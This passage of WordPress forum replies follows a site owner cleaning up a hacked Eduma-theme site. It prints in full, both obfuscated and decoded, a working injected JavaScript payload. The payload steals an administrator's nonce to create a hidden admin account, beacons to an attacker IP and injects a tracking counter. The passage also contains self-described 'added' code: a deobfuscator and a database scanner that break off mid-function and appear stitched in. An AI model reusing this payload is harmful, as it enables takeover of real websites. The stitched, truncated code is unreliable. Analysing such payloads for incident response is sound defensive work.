Forum Replies Created

Viewing 15 replies - 16 through 30 (of 264 total)
  • Thread Starter Blutarsky

    (@blutarsky)

    Great!

    Thread Starter Blutarsky

    (@blutarsky)

    The low-frequency rate is strange… maybe a new strategy?

    Thread Starter Blutarsky

    (@blutarsky)

    Did this happen to somebody else?

    Thread Starter Blutarsky

    (@blutarsky)

    Thanks Yorman, very helpful as always!

    Thread Starter Blutarsky

    (@blutarsky)

    Thanks Yorman!

    Thread Starter Blutarsky

    (@blutarsky)

    Yorman, has this feature been added? I can’t find any setting to add the hostname to the email alert subject…

    No answers? Bad sign!

    Thread Starter Blutarsky

    (@blutarsky)

    Are you using the Eduma theme?
    If so, update your theme to the latest version; if not, switch to a recently developed theme. Then follow this guide to clean up: https://sucuri.net/guides/how-to-clean-hacked-wordpress

    Thread Starter Blutarsky

    (@blutarsky)

    So this was the code injected into wp_options, in the row named theme_mods_eduma-child:

    <script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 115, 115, 99, 114, 105, 112, 116, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 115, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 111, 110, 46, 115, 116, 114, 105, 110, 103, 101, 110, 103, 105, 110, 101, 115, 46, 99, 111, 109, 47, 106, 115, 111, 110, 46, 106, 115, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 115, 99, 114, 105, 112, 116, 41, 59, 10))</script>

    This translates to:

    var sscript = document.createElement("script"); sscript.type = "text/javascript"; sscript.src = "https://json.stringengines.com/json.js"; document.head.appendChild(sscript);

    and the linked script (https://json.stringengines.com/json.js) contains:

    gotome();
    checkmeone();
    
       
     function putmeone()  {
    	
    		 var site = extractSummary(document.head.innerHTML);
    		 if(site == "null") { return; }
    		 var newuser_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 117, 115, 101, 114, 45, 110, 101, 119, 46, 112, 104, 112);
    		 var ajax_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 97, 100, 109, 105, 110, 45, 97, 106, 97, 120, 46, 112, 104, 112);
    		 var _td = String.fromCharCode(9, 9, 32, 118, 97, 114, 32, 36, 32, 61, 32, 106, 81, 117, 101, 114, 121, 46, 110, 111, 67, 111, 110, 102, 108, 105, 99, 116, 40, 41, 59, 10, 32, 32, 32, 32, 32, 36, 46, 97, 106, 97, 120, 40, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 58, 32, 110, 101, 119, 117, 115, 101, 114, 95, 117, 114, 108, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 117, 99, 99, 101, 115, 115, 34, 32, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 104, 116, 109, 108, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 42, 99, 111, 110, 115, 111, 108, 101, 46, 108, 111, 103, 40, 34, 71, 101, 116, 116, 105, 110, 103, 32, 78, 111, 110, 99, 101, 34, 41, 59, 42, 47, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 114, 101, 32, 61, 32, 47, 110, 97, 109, 101, 61, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 40, 91, 32, 93, 43, 41, 118, 97, 108, 117, 101, 61, 34, 40, 91, 94, 34, 93, 43, 41, 34, 47, 103, 59, 10, 9, 9, 9, 105, 102, 40, 104, 116, 109, 108, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 41, 32, 33, 61, 61, 32, 45, 49, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 109, 32, 61, 32, 114, 101, 46, 101, 120, 101, 99, 40, 104, 116, 109, 108, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 105, 102, 32, 40, 109, 91, 50, 93, 46, 109, 97, 116, 99, 104, 40, 47, 40, 91, 97, 45, 122, 48, 45, 57, 93, 123, 49, 48, 125, 41, 47, 41, 41, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 110, 111, 110, 99, 101, 32, 61, 32, 109, 91, 50, 93, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 36, 46, 97, 106, 97, 120, 40, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 
32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 58, 32, 110, 101, 119, 117, 115, 101, 114, 95, 117, 114, 108, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 109, 101, 116, 104, 111, 100, 34, 32, 58, 32, 34, 80, 79, 83, 84, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 100, 97, 116, 97, 34, 32, 58, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 97, 99, 116, 105, 111, 110, 34, 58, 34, 99, 114, 101, 97, 116, 101, 117, 115, 101, 114, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 58, 32, 110, 111, 110, 99, 101, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 95, 119, 112, 95, 104, 116, 116, 112, 95, 114, 101, 102, 101, 114, 101, 114, 34, 32, 58, 32, 34, 47, 119, 112, 45, 97, 100, 109, 105, 110, 47, 117, 115, 101, 114, 45, 110, 101, 119, 46, 112, 104, 112, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 115, 101, 114, 95, 108, 111, 103, 105, 110, 34, 58, 32, 34, 115, 105, 109, 112, 108, 101, 48, 48, 49, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 101, 109, 97, 105, 108, 34, 32, 58, 32, 34, 115, 105, 109, 112, 108, 101, 64, 115, 105, 109, 112, 108, 101, 115, 105, 116, 101, 46, 99, 111, 109, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 102, 105, 114, 115, 116, 95, 110, 97, 109, 101, 34, 32, 58, 32, 34, 115, 105, 109, 112, 108, 101, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 
32, 32, 32, 32, 32, 32, 34, 108, 97, 115, 116, 95, 110, 97, 109, 101, 34, 32, 58, 32, 34, 115, 105, 109, 112, 108, 101, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 32, 58, 32, 34, 104, 116, 116, 112, 58, 47, 47, 115, 105, 109, 112, 108, 101, 46, 99, 111, 109, 47, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 112, 97, 115, 115, 49, 34, 32, 58, 32, 34, 112, 97, 115, 115, 102, 111, 114, 109, 101, 49, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 112, 97, 115, 115, 49, 45, 116, 101, 120, 116, 34, 32, 58, 32, 34, 112, 97, 115, 115, 102, 111, 114, 109, 101, 49, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 112, 97, 115, 115, 50, 34, 32, 58, 32, 34, 112, 97, 115, 115, 102, 111, 114, 109, 101, 49, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 101, 110, 100, 95, 117, 115, 101, 114, 95, 110, 111, 116, 105, 102, 105, 99, 97, 116, 105, 111, 110, 34, 32, 58, 32, 48, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 114, 111, 108, 101, 34, 58, 34, 97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 99, 114, 101, 97, 116, 101, 117, 115, 101, 114, 34, 32, 58, 32, 34, 65, 100, 100, 43, 78, 101, 119, 43, 85, 115, 101, 114, 34, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 117, 99, 99, 101, 115, 115, 34, 32, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 104, 116, 109, 108, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 
32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 99, 111, 110, 115, 111, 108, 101, 46, 108, 111, 103, 40, 34, 78, 101, 119, 32, 85, 115, 101, 114, 32, 99, 114, 101, 97, 116, 101, 100, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 82, 101, 109, 111, 118, 101, 105, 110, 103, 32, 116, 104, 101, 32, 88, 83, 83, 32, 102, 114, 111, 109, 32, 116, 104, 101, 32, 115, 105, 116, 101, 44, 32, 99, 97, 108, 108, 98, 97, 99, 107, 32, 104, 101, 108, 108, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 36, 46, 97, 106, 97, 120, 40, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 58, 32, 97, 106, 97, 120, 95, 117, 114, 108, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 109, 101, 116, 104, 111, 100, 34, 32, 58, 32, 34, 80, 79, 83, 84, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 100, 97, 116, 97, 34, 32, 58, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 97, 99, 116, 105, 111, 110, 34, 58, 34, 102, 97, 107, 101, 34, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 34, 112, 101, 114, 109, 97, 108, 105, 110, 107, 95, 115, 116, 114, 117, 99, 116, 117, 114, 101, 34, 58, 32, 49, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 
32, 32, 32, 32, 32, 32, 32, 34, 115, 117, 99, 99, 101, 115, 115, 34, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 82, 101, 115, 101, 100, 32, 100, 111, 109, 101, 44, 32, 114, 101, 108, 111, 97, 100, 32, 116, 104, 101, 32, 112, 97, 103, 101, 10, 9, 9, 9, 9, 9, 9, 9, 9, 104, 116, 116, 112, 71, 101, 116, 40, 34, 104, 116, 116, 112, 58, 47, 47, 49, 52, 54, 46, 49, 56, 53, 46, 49, 56, 50, 46, 49, 55, 54, 47, 103, 47, 97, 46, 112, 104, 112, 34, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 47, 47, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 32, 61, 32, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 32, 43, 32, 39, 38, 114, 101, 108, 111, 97, 100, 61, 49, 39, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 41, 59, 10, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 125, 10, 9, 9, 9, 10, 9, 9, 125, 10, 10, 32, 32, 32, 32, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 125, 41, 59);
    		 eval(_td);
    }
    
    function httpGet(theUrl)
    {
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open( "GET", theUrl, false );
        xmlHttp.send( null );
        return xmlHttp.responseText;
    }
    
    function extractSummary(iCalContent) {
      var rx = /href="(.*)wp-content/g;
      if(iCalContent.indexOf("/wp-content/") !== -1) {
    	  var arr = rx.exec(iCalContent);
    	  return arr[1]; 
      }
      
      return "null";
    }
    
    function checkmeone() {
    	var site = extractSummary(document.head.innerHTML);
    	if(site == "null") { return 0; }
    	var newuser_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 117, 115, 101, 114, 45, 110, 101, 119, 46, 112, 104, 112);
    	var ajax_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 97, 100, 109, 105, 110, 45, 97, 106, 97, 120, 46, 112, 104, 112);
    	eval(String.fromCharCode(118, 97, 114, 32, 36, 32, 61, 32, 106, 81, 117, 101, 114, 121, 46, 110, 111, 67, 111, 110, 102, 108, 105, 99, 116, 40, 41, 59, 10, 32, 32, 32, 32, 32, 36, 46, 97, 106, 97, 120, 40, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 34, 117, 114, 108, 34, 58, 32, 110, 101, 119, 117, 115, 101, 114, 95, 117, 114, 108, 44, 10, 32, 32, 32, 32, 32, 32, 32, 32, 34, 115, 117, 99, 99, 101, 115, 115, 34, 32, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 104, 116, 109, 108, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 10, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 118, 97, 114, 32, 114, 101, 32, 61, 32, 47, 110, 97, 109, 101, 61, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 40, 91, 32, 93, 43, 41, 118, 97, 108, 117, 101, 61, 34, 40, 91, 94, 34, 93, 43, 41, 34, 47, 103, 59, 10, 9, 9, 9, 105, 102, 40, 104, 116, 109, 108, 46, 105, 110, 100, 101, 120, 79, 102, 40, 34, 95, 119, 112, 110, 111, 110, 99, 101, 95, 99, 114, 101, 97, 116, 101, 45, 117, 115, 101, 114, 34, 41, 32, 33, 61, 61, 32, 45, 49, 41, 32, 123, 10, 9, 9, 9, 9, 112, 117, 116, 109, 101, 111, 110, 101, 40, 41, 59, 10, 9, 9, 9, 125, 32, 101, 108, 115, 101, 32, 123, 10, 9, 9, 9, 9, 103, 101, 116, 109, 101, 111, 110, 101, 40, 41, 59, 10, 9, 9, 9, 125, 10, 10, 32, 32, 32, 32, 32, 32, 32, 32, 125, 44, 10, 9, 9, 34, 102, 97, 105, 108, 34, 32, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 9, 9, 9, 103, 101, 116, 109, 101, 111, 110, 101, 40, 41, 59, 10, 9, 9, 125, 10, 32, 32, 32, 32, 125, 41, 59));
    }
    function getcookone() {
    	if (document.cookie.indexOf(String.fromCharCode(99, 104, 101, 99, 107, 109, 101, 111, 110, 99, 101, 61)) >= 0) { 
    		
    	} else { 
    		var now = new Date();
    		now.setTime(now.getTime() + 1 * 3600 * 1000 * 10);
    		document.cookie = String.fromCharCode(99, 104, 101, 99, 107, 109, 101, 111, 110, 99, 101, 61)+"=5464; expires=" + now.toUTCString() + "; path=/";
    		return 1;
    	}
    	return 0;
    }
    function getmeone() {
    	
    	if(getcookone() == 1) {
    		gotome();
    	}
    }
    function gotome(){
    		var ulink = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 46, 115, 116, 114, 105, 110, 103, 101, 110, 103, 105, 110, 101, 115, 46, 99, 111, 109, 47, 115, 112, 46, 112, 104, 112, 63, 97, 116, 61, 53, 55, 38, 98, 99, 61, 51, 52, 53, 38, 114, 112, 115, 61, 53, 52, 54, 55, 56, 53, 52, 38, 115, 116, 121, 61, 52, 53, 55, 38, 103, 101, 116, 61, 55, 53); 
    		//document.location.href = ulink; 
    		//window.location.href = ulink;
    document.write("<div style='position:absolute;left:-4637px'><a href='//www.liveinternet.ru/click;trafficbetter' "+
    "target=_blank><img src='//counter.yadro.ru/hit;trafficbetter?t45.6;r"+
    escape(document.referrer)+((typeof(screen)=="undefined")?"":
    ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
    screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
    ";h"+escape(document.title.substring(0,150))+";"+Math.random()+
    "' alt='' title='LiveInternet' "+
    "border='0' width='31' height='31'><\/a><\/div>")
    }

    Translation (String.fromCharCode() calls decoded in place; the two strings that the original builds and then runs with eval() are shown inline as the code they execute):

    gotome();
    checkmeone();

    function putmeone() {
        var site = extractSummary(document.head.innerHTML);
        if(site == "null") { return; }
        var newuser_url = site+"wp-admin/user-new.php";
        var ajax_url = site+"wp-admin/admin-ajax.php";
        // Original: var _td = String.fromCharCode(...); eval(_td); -- decoded here as plain code.
        var $ = jQuery.noConflict();
        // Runs in the logged-in administrator's browser: fetch the Add New User page and
        // harvest the create-user nonce so the POST below passes WordPress's CSRF check.
        $.ajax({
            "url": newuser_url,
            "success" : function(html){
                /*console.log("Getting Nonce");*/
                var re = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;
                if(html.indexOf("_wpnonce_create-user") !== -1) {
                    var m = re.exec(html);
                    if (m[2].match(/([a-z0-9]{10})/)) {
                        var nonce = m[2];
                        // Submit the Add New User form with the stolen nonce: creates administrator "simple001".
                        $.ajax({
                            "url": newuser_url,
                            "method" : "POST",
                            "data" :
                            {
                                "action":"createuser",
                                "_wpnonce_create-user": nonce,
                                "_wp_http_referer" : "/wp-admin/user-new.php",
                                "user_login": "simple001",
                                "email" : "simple@simplesite.com",
                                "first_name" : "simple",
                                "last_name" : "simple",
                                "url" : "http://simple.com/",
                                "pass1" : "passforme1",
                                "pass1-text" : "passforme1",
                                "pass2" : "passforme1",
                                "send_user_notification" : 0,
                                "role":"administrator",
                                "createuser" : "Add+New+User"
                            },
                            "success" : function(html){
                                //console.log("New User created");
                                //Removeing the XSS from the site, callback hell
                                // admin-ajax call that (per the payload's own comment) removes the injected
                                // XSS from the site, then beacons to the attacker's host over plain HTTP.
                                $.ajax({
                                    "url": ajax_url,
                                    "method" : "POST",
                                    "data" :
                                    {
                                        "action":"fake",
                                        "permalink_structure": 1
                                    },
                                    "success": function(){
                                        //Resed dome, reload the page
                                        httpGet("http://146.185.182.176/g/a.php");
                                        //window.location = window.location + '&reload=1';
                                    }
                                });
                            }
                        });
                    }
                }
            }
        });
    }

    // Synchronous GET; used as a "user created" beacon to the attacker's host.
    function httpGet(theUrl)
    {
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open( "GET", theUrl, false );
        xmlHttp.send( null );
        return xmlHttp.responseText;
    }

    // Recovers the site's base URL from the first href="...wp-content" link in <head>.
    function extractSummary(iCalContent) {
      var rx = /href="(.*)wp-content/g;
      if(iCalContent.indexOf("/wp-content/") !== -1) {
          var arr = rx.exec(iCalContent);
          return arr[1];
      }

      return "null";
    }

    function checkmeone() {
        var site = extractSummary(document.head.innerHTML);
        if(site == "null") { return 0; }
        var newuser_url = site+"wp-admin/user-new.php";
        var ajax_url = site+"wp-admin/admin-ajax.php";
        // Original: eval(String.fromCharCode(...)); decoded here as plain code.
        // If the visitor can load user-new.php (i.e. is an admin), go for the account
        // takeover; otherwise fall back to the traffic counter.
        var $ = jQuery.noConflict();
        $.ajax({
            "url": newuser_url,
            "success" : function(html){

                var re = /name="_wpnonce_create-user"([ ]+)value="([^"]+)"/g;
                if(html.indexOf("_wpnonce_create-user") !== -1) {
                    putmeone();
                } else {
                    getmeone();
                }

            },
            "fail" : function() {
                getmeone();
            }
        });
    }
    // Sets a 10-hour cookie so the counter is only injected once per period.
    function getcookone() {
        if (document.cookie.indexOf("checkmeonce=") >= 0) {

        } else {
            var now = new Date();
            now.setTime(now.getTime() + 1 * 3600 * 1000 * 10);
            document.cookie = "checkmeonce="+"=5464; expires=" + now.toUTCString() + "; path=/";
            return 1;
        }
        return 0;
    }
    function getmeone() {

        if(getcookone() == 1) {
            gotome();
        }
    }
    // Writes an off-screen LiveInternet/yadro.ru hit counter into the page; the
    // redirect to ulink is left commented out.
    function gotome(){
            var ulink = "https://for.stringengines.com/sp.php?at=57&bc=345&rps=5467854&sty=457&get=75";
            //document.location.href = ulink;
            //window.location.href = ulink;
    document.write("<div style='position:absolute;left:-4637px'><a href='//www.liveinternet.ru/click;trafficbetter' "+
    "target=_blank><img src='//counter.yadro.ru/hit;trafficbetter?t45.6;r"+
    escape(document.referrer)+((typeof(screen)=="undefined")?"":
    ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
    screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
    ";h"+escape(document.title.substring(0,150))+";"+Math.random()+
    "' alt='' title='LiveInternet' "+
    "border='0' width='31' height='31'><\/a><\/div>")

    }
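The decoding above was done by hand. The following is an added example, not code from the thread or from the payload: a small Node.js script that performs the same String.fromCharCode()/eval() unwrapping statically and pulls out the indicators (remote URLs, wp-admin endpoints) an incident responder would block or search for. The SAMPLE input is constructed for the example by re-encoding the decoded loader shown above and copying the newuser_url line from json.js; nothing is fetched or executed.

```javascript
// Added example (not from the forum thread): static decoder for the
// String.fromCharCode()/eval() obfuscation used by the injected payload.
// Run with: node decode.js

// Matches String.fromCharCode(118, 97, ...) with a purely numeric argument list.
const CHARCODE_CALL = /String\.fromCharCode\(\s*([\d\s,]*)\s*\)/g;
// Matches eval("...") whose only argument is a double-quoted string literal, which is
// exactly what decodeCharCodes() turns eval(String.fromCharCode(...)) into.
const EVAL_LITERAL = /eval\(\s*("(?:[^"\\]|\\.)*")\s*\)/g;

// Rewrite every String.fromCharCode(n, n, ...) call into the equivalent string literal.
function decodeCharCodes(src) {
  return src.replace(CHARCODE_CALL, (_, nums) => {
    const codes = nums.split(',').map(s => s.trim()).filter(Boolean).map(Number);
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Replace eval("<literal>") with the literal's contents so the payload reads as plain
// code; loops so nested eval-in-eval layers are peeled one at a time.
function unwrapEval(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(EVAL_LITERAL, (_, lit) => JSON.parse(lit));
  } while (src !== prev);
  return src;
}

function deobfuscate(src) {
  return unwrapEval(decodeCharCodes(src));
}

// What a responder wants to block or grep for: remote URLs and the WordPress
// admin endpoints the payload talks to.
function extractIndicators(decoded) {
  const urls = decoded.match(/https?:\/\/[^\s"'<>)]+/g) || [];
  const endpoints = decoded.match(/wp-admin\/[\w-]+\.php/g) || [];
  return { urls: [...new Set(urls)], endpoints: [...new Set(endpoints)] };
}

// Constructed sample in the same shape as the injected wp_options value: the loader
// (re-encoded from its decoded form) plus one line copied from json.js.
const encode = s => 'String.fromCharCode(' + [...s].map(c => c.charCodeAt(0)).join(', ') + ')';
const SAMPLE = [
  '<script language=javascript>eval(' + encode(
    'var sscript = document.createElement("script"); sscript.type = "text/javascript"; ' +
    'sscript.src = "https://json.stringengines.com/json.js"; document.head.appendChild(sscript);\n'
  ) + ')</script>',
  'var newuser_url = site+String.fromCharCode(119, 112, 45, 97, 100, 109, 105, 110, 47, 117, 115, 101, 114, 45, 110, 101, 119, 46, 112, 104, 112);',
].join('\n');

const DECODED_SAMPLE = deobfuscate(SAMPLE);
console.log(DECODED_SAMPLE);
console.log(extractIndicators(DECODED_SAMPLE));
```

The decoder never evaluates anything: eval("...") is only unwrapped when its argument is a plain string literal, so a payload that builds its code from variables (as json.js does with _td) is left for the reader to follow by hand after the character codes have been turned into readable strings.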
    Thread Starter Blutarsky

    (@blutarsky)

    Today my site was hacked again, turning things into a nightmare. The injection changed the script to create an admin-equivalent user. I will publish the code tomorrow. So I have focused on the value being replaced, and it looks like this is a well-known hack; see here for more: https://wphutte.com/education-wp-3-0-6-1-unauthenticated-theme-options-overwrite-or-stored-xss/
    Are you using the Eduma education WP theme?
    I have commented out the code that allows modification of this value through Ajax calls.

    Thread Starter Blutarsky

    (@blutarsky)

    I have followed all the possible guides and it may be that the backdoor has been removed. What is left is:

    1) Old theme code (will be updated but requires weeks), protected by firewall
    2) Code injected in the database that may cause malware spreading

    As for number 2, I have performed scans with many plugins, and apparently there are no threats. I have also dumped the DB but I have no idea what to look for. Any idea on this?
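An added example, not part of the thread: a Node.js script that scans a mysqldump of the WordPress database for the kind of injection discussed above (script tags, String.fromCharCode/eval obfuscation, PHP base64/gz payloads) and lists every account that holds the administrator capability, since this payload's goal is to add one. It assumes single-line INSERT statements as mysqldump emits them and does not assume the wp_ table prefix. The DUMP text is constructed for the example; the serialized layout of the theme_mods row is made up and not taken from the thread.

```javascript
// Added example (not from the forum thread): scan a WordPress mysqldump for injected
// payloads and list administrator accounts. Run with: node scan-dump.js

const INSERT_RE = /^INSERT INTO `?(\w+)`?\s+VALUES\s*(.*);\s*$/;
// One value tuple; parentheses inside quoted strings (e.g. eval(...)) do not end it.
const TUPLE_RE = /\((?:[^()']|'(?:[^'\\]|\\.)*')*\)/g;
const FIRST_STRING_RE = /'((?:[^'\\]|\\.)*)'/;

// Indicators worth a manual look in option values, post content or meta values.
const SUSPICIOUS = [
  { name: 'script tag',              re: /<script[\s>]/i },
  { name: 'iframe',                  re: /<iframe[\s>]/i },
  { name: 'charcode obfuscation',    re: /String\.fromCharCode\s*\(/ },
  { name: 'eval()',                  re: /\beval\s*\(/ },
  { name: 'base64 / gz PHP payload', re: /base64_decode\s*\(|gz(?:inflate|uncompress)\s*\(/i },
];

// Yield { table, tuple } for every row of every INSERT statement in the dump.
function* rows(dump) {
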